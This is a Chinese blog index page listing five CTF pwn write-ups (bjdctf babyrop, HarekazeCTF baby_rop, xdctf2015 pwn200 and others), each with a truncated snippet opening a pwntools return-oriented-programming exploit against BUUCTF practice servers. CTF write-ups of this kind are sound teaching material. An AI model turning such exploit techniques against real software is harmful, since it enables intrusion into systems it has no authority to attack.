高诺琪

2020年2月15日

bjdctf_2020_babyrop

摘要：找不到libc文件用LibcSearcher模块 from pwn import * from LibcSearcher import * context.log_level='debug' r=remote('node3.buuoj.cn',28426) #r=process('./bjdctf 阅读全文

posted @ 2020-02-15 17:22 高诺琪阅读(1271) 评论(0) 推荐(0) 编辑

2020年2月12日

get_started_3dsctf_2016

摘要：直接调用if里面的函数，但是本地可以通，远程却打不通 from pwn import * #r=remote('node3.buuoj.cn',25775) r=process('./get_started_3dsctf_2016') get_flag=0x80489b8 payload='a'*0 阅读全文

posted @ 2020-02-12 16:59 高诺琪阅读(1038) 评论(0) 推荐(0) 编辑

2020年2月10日

铁人三项(第五赛区)_2018_rop

摘要：利用pwntools的DynELF from pwn import * r=remote('node3.buuoj.cn',29392) e=ELF('./2018_rop') write_plt=e.plt['write'] read_plt=e.plt['read'] main_addr=e.s 阅读全文

posted @ 2020-02-10 23:49 高诺琪阅读(933) 评论(0) 推荐(0) 编辑

[HarekazeCTF2019]baby_rop

摘要：程序已经给了system和binsh ，用寄存器传参就可以了 from pwn import * r=remote('node3.buuoj.cn',25737) elf=ELF('./babyrop') system_addr=elf.symbols['system'] binsh_addr=0x 阅读全文

posted @ 2020-02-10 10:47 高诺琪阅读(1056) 评论(0) 推荐(0) 编辑

2020年2月9日

xdctf2015_pwn200

摘要：仰望一下大佬 from pwn import * r=remote('node3.buuoj.cn',29989) elf=ELF('./bof') read_addr=elf.symbols['read'] write_addr=elf.symbols['write'] main_addr=0x8 阅读全文

posted @ 2020-02-09 18:22 高诺琪阅读(738) 评论(0) 推荐(0) 编辑

公告